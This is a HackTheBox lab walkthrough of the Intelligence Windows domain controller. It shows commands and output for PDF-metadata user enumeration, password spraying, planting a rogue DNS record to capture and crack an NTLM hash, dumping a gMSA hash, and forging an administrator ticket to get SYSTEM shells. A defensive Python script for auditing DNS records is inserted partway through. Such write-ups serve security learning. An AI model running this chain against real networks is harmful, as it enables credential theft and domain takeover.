Intelligence
A medium Windows box from HackTheBox. Enumerate users by scraping metadata from PDFs hosted on the web site, password-spray a default password to get SMB access, use that access to capture another user's NTLM hash by abusing a custom script, and finally abuse ReadGMSAPassword to craft a TGT as administrator and get root.
Recon
Regular nmap scan:
georgy@pop-os:~/Documents/htb/intelligence$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.248
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-10-06 10:28:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-10-06T10:29:48+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-10-06T10:29:47+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-10-06T10:29:48+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-10-06T10:29:47+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-10-06T10:29:11
|_ start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
A few important things stand out:
- HTTP on port 80 (add intelligence.htb to /etc/hosts)
- It's a domain controller (LDAP, Kerberos and RPC)
- The domain is intelligence.htb and the DC's hostname is dc.intelligence.htb (from the LDAP certificate)
Let's check out the HTTP server.
The site gives an email address, contact@intelligence.htb.
It also links two PDF files that can be downloaded from the home page; checking them with exiftool turns up two likely usernames in the Creator field:
georgy@pop-os:~/Documents/htb/intelligence$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number : 12.47
File Name : 2020-01-01-upload.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2022:10:06 01:43:13-04:00
File Inode Change Date/Time : 2022:10:06 01:43:13-04:00
File Permissions : -rw-rw-r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee
georgy@pop-os:~/Documents/htb/intelligence$ exiftool 2020-12-15-upload.pdf
ExifTool Version Number : 12.47
File Name : 2020-12-15-upload.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2022:10:06 01:44:33-04:00
File Inode Change Date/Time : 2022:10:06 01:44:33-04:00
File Permissions : -rw-rw-r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : Jose.Williams
So two usernames: William.Lee and Jose.Williams.
There are likely more usernames in more files on the server, but first let's validate that these two exist with kerbrute:
georgy@pop-os:~/Documents/htb/intelligence$ kerbrute userenum -d intelligence.htb --dc 10.10.10.248 users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 10/06/22 - Ronnie Flathers @ropnop
2022/10/06 02:02:19 > Using KDC(s):
2022/10/06 02:02:19 > 10.10.10.248:88
2022/10/06 02:02:19 > [+] VALID USERNAME: William.Lee@intelligence.htb
2022/10/06 02:02:19 > [+] VALID USERNAME: Jose.Williams@intelligence.htb
2022/10/06 02:02:19 > Done! Tested 2 usernames (2 valid) in 0.048 seconds
Before trying a password spray, let's see if there are any more PDFs in the /Documents folder on the web server. The two known files follow a YYYY-MM-DD-upload.pdf naming scheme, so just walk the dates with this Python script:
import datetime
import requests

# Try every date in the range against the naming scheme seen on the home page
start = datetime.date(2020, 1, 1)
end = datetime.date(2021, 7, 30)
while start < end:
    url = start.strftime("http://10.10.10.248/Documents/%Y-%m-%d-upload.pdf")
    r = requests.get(url)
    if r.status_code == 200:
        print(url)
        # save the PDF under its original file name
        with open(url.rsplit("/", 1)[1], "wb") as f:
            f.write(r.content)
    start += datetime.timedelta(days=1)
Then loop over the PDFs with exiftool to build a unique list of users:
georgy@pop-os:~/Documents/htb/intelligence$ for file in ./*.pdf; do exiftool $file | grep Creator | cut -f 2 -d ':' | cut -c 2- >> users.txt; done; sort -u -o users.txt users.txt
georgy@pop-os:~/Documents/htb/intelligence$ cat users.txt
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
Reading the contents of the PDFs more closely turns up a default password:
# remove definitely useless files
georgy@pop-os:~/Documents/htb/intelligence$ rm $(pdfgrep lorem -i *.pdf | cut -f 1 -d ':')
# cat the remaining ~10 pdfs and scroll through the output
georgy@pop-os:~/Documents/htb/intelligence$ for f in ./*.pdf ; do pdftotext $f f.txt; cat f.txt; rm f.txt; done;
Inside the extracted text, find some default creds:
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
Clearly the next step is a password spray with this default password against the users we collected.
Exploitation
Doing the spray with crackmapexec finds a valid password:
georgy@pop-os:~/Documents/htb/intelligence$ cme smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876
...
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
So the full creds are Tiffany.Molina:NewIntelligenceCorpUser9876.
Now let's see what we can find on the SMB shares as this user:
georgy@pop-os:~/Documents/htb/intelligence$ smbclient -L \\\\10.10.10.248 --user=Tiffany.Molina --password=NewIntelligenceCorpUser9876
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
The non-standard IT share stands out; inside it is a script called "downdetector.ps1":
georgy@pop-os:~/Documents/htb/intelligence$ smbclient \\\\10.10.10.248\\IT --user=Tiffany.Molina --password=NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1453822 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (6.3 KiloBytes/sec) (average 6.3 KiloBytes/sec)
downdetector.ps1 runs every 5 minutes, makes an HTTP request to every AD DNS record whose name starts with "web" (authenticating with the default credentials of whichever account runs it), and emails "Ted Graves" if any of them are down:
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
Since Tiffany.Molina can add records to the AD-integrated zone (authenticated users can by default), we can capture the running account's NTLM hash by adding our own record beginning with "web" that points at our host:
georgy@pop-os:/opt/krbrelayx$ python3 dnstool.py -u intelligence.htb\\Tiffany.Molina -p NewIntelligenceCorpUser9876 -a add --type A --data 10.10.14.7 --record web-pwned 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Then set up Responder and wait, since the script runs every 5 minutes:
georgy@pop-os:/opt/Responder$ sudo ./Responder.py -I tun0
...
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:a21423f19c069a...
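What the web-pwned record looks like from the other side: a defender pulling the zone over LDAP gets each entry's dnsRecord attribute as a binary DNS_RPC_RECORD (MS-DNSP 2.3.2.2) and can flag web* names resolving outside the server subnet. The Python below is an added example, not part of this writeup or of the krbrelayx/dnstool code; the zone contents, the 10.10.10.0/24 range and the build_a_record helper (used only to construct sample data) are assumptions.

```python
import ipaddress
import struct

# Layout of a dnsRecord attribute value (MS-DNSP 2.3.2.2, DNS_RPC_RECORD): a 24-byte
# header followed by DataLength bytes of RDATA. Everything is little-endian except
# TtlSeconds, which is big-endian. TimeStamp is hours since 1601 (0 = static record).
_HEADER = "<HHBBHL"   # DataLength, Type, Version, Rank, Flags, Serial
DNS_TYPE_A = 1

def parse_dns_record(blob):
    """Decode one dnsRecord value; the address is decoded for A records only."""
    data_len, rtype, _version, _rank, _flags, serial = struct.unpack_from(_HEADER, blob, 0)
    ttl = struct.unpack_from(">L", blob, 12)[0]
    _reserved, timestamp = struct.unpack_from("<LL", blob, 16)
    data = blob[24:24 + data_len]
    rec = {"type": rtype, "ttl": ttl, "serial": serial, "timestamp": timestamp}
    if rtype == DNS_TYPE_A and data_len == 4:
        rec["address"] = str(ipaddress.IPv4Address(data))
    return rec

def build_a_record(ip, serial, timestamp=0, ttl=180):
    """Encode an A record in the same layout (used here only to construct sample data)."""
    data = ipaddress.IPv4Address(ip).packed
    header = struct.pack(_HEADER, len(data), DNS_TYPE_A, 5, 0xF0, 0, serial)
    return header + struct.pack(">L", ttl) + struct.pack("<LL", 0, timestamp) + data

def audit_web_records(zone, trusted_nets):
    """Return (name, address) for every web* A record whose address lies outside
    trusted_nets. zone: iterable of (record name, dnsRecord bytes)."""
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    findings = []
    for name, blob in zone:
        if not name.lower().startswith("web"):
            continue                      # downdetector.ps1 only polls web* names
        rec = parse_dns_record(blob)
        if "address" in rec and not any(ipaddress.ip_address(rec["address"]) in n for n in nets):
            findings.append((name, rec["address"]))
    return findings

# Constructed zone content: the DC, a legitimate web record, and a record that an
# ordinary domain user added pointing at a host outside the server subnet.
SAMPLE_ZONE = [
    ("dc", build_a_record("10.10.10.248", serial=1)),
    ("web", build_a_record("10.10.10.248", serial=2)),
    ("web-pwned", build_a_record("10.10.14.7", serial=3, timestamp=3700000)),
]
```

A non-zero TimeStamp on a record nobody registered through DHCP or a server is a second hint worth checking in the same pass.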
Now crack it with hashcat to get Ted.Graves:Mr.Teddy:
georgy@pop-os:~/Documents/htb/intelligence$ hashcat -m 5600 hash /opt/seclists/Passwords/Leaked-Databases/rockyou.txt
...
TED.GRAVES::intelligence:a21423f19c069a64:36a9650cfed16927094d8f55036a4130:...:Mr.Teddy
Now use these creds with bloodhound-python, running the collection remotely:
georgy@pop-os:~/Documents/htb/intelligence$ /opt/bloodhound-py/./bloodhound.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc intelligence.htb
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
INFO: Skipping enumeration for svc_int.intelligence.htb since it could not be resolved.
INFO: Done in 00M 06S
Load it into BloodHound and look at the Ted.Graves user: they have derivative control (ReadGMSAPassword) over SVC_INT.
Let's see if we can leverage this to get domain admin; gMSADumper is a tool built specifically for reading gMSA passwords:
georgy@pop-os:/opt/gMSADumper$ sudo python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::4b18bc2b883607c026d27bf526bcb3d4
svc_int$:aes256-cts-hmac-sha1-96:0a56a47fee5f504c5e9eee9292a3ed7dadaeeb2ef9953ab7a5b84437c88b4b3d
svc_int$:aes128-cts-hmac-sha1-96:cc415f2ddee6c3b7180d77106743e514
Now that we have the SVC_INT NTLM hash, we can use it with getST.py from impacket to request a ticket that impersonates the administrator (S4U).
The SPN to request is listed under Node Info -> Node Properties for the svc_int user in BloodHound:
georgy@pop-os:~/Documents/htb/intelligence$ /opt/impacket/examples/./getST.py -dc-ip 10.10.10.248 -hashes :4b18bc2b883607c026d27bf526bcb3d4 -spn www/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
The request fails because our clock is too far off the DC's (the nmap output already showed a ~7h skew, and Kerberos tolerates 5 minutes by default), so sync the clock first:
georgy@pop-os:~/Documents/htb/intelligence$ sudo ntpdate 10.10.10.248
With the ticket saved as administrator.ccache, use the wmiexec.py script from impacket to get a shell. wmiexec leverages Windows Management Instrumentation; this particular script only works with administrator creds:
georgy@pop-os:~/Documents/htb/intelligence$ KRB5CCNAME=administrator.ccache /opt/impacket/examples/./wmiexec.py -k -no-pass administrator@dc.intelligence.htb
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
intelligence\administrator
And get root!
smbexec.py does something similar:
georgy@pop-os:/opt/impacket/examples$ KRB5CCNAME=~/Documents/htb/intelligence/administrator.ccache /opt/impacket/examples/./smbexec.py -k -no-pass administrator@dc.intelligence.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
Or psexec.py:
georgy@pop-os:/opt/impacket/examples$ KRB5CCNAME=Administrator.ccache python3 psexec.py intelligence.htb/administrator@dc.intelligence.htb -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file KKjOfkwp.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service pIMy on dc.intelligence.htb.....
[*] Starting service pIMy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system